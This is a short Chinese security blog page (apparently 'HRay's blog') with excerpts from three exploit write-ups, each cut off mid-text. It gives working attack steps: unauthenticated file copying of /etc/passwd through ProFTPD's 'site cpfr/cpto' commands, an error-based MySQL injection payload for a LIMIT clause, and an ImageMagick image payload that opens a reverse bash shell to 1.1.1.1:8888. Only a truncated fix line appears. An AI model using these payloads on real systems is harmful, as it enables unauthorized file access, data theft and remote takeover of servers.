HRay's blog

文章来源自《安全参考》第30期，略有改动影响版本：proftpd-1.3.4－－－proftpd-1.3.51.执行命令nc x.x.x.x 212.执行site cpfr /etc/passwd可以未授权状态复制文件3.执行site cpto /tmp/test可将之前复制的/etc/passwd粘贴到/tmp/test高级用法：s

今天遇到的，记录下，如下位置产生sql注入select xxx from x order by xx limit {sql}花括号位置为可控的点，支持报错的话可以利用如下语句获取内容http://test.com/test.php?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23不支持报

利用：如下内容保存为图片格式上传即可（命令部分自行替换）push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'pop graphic-context修复（php）：上传时先利用getimage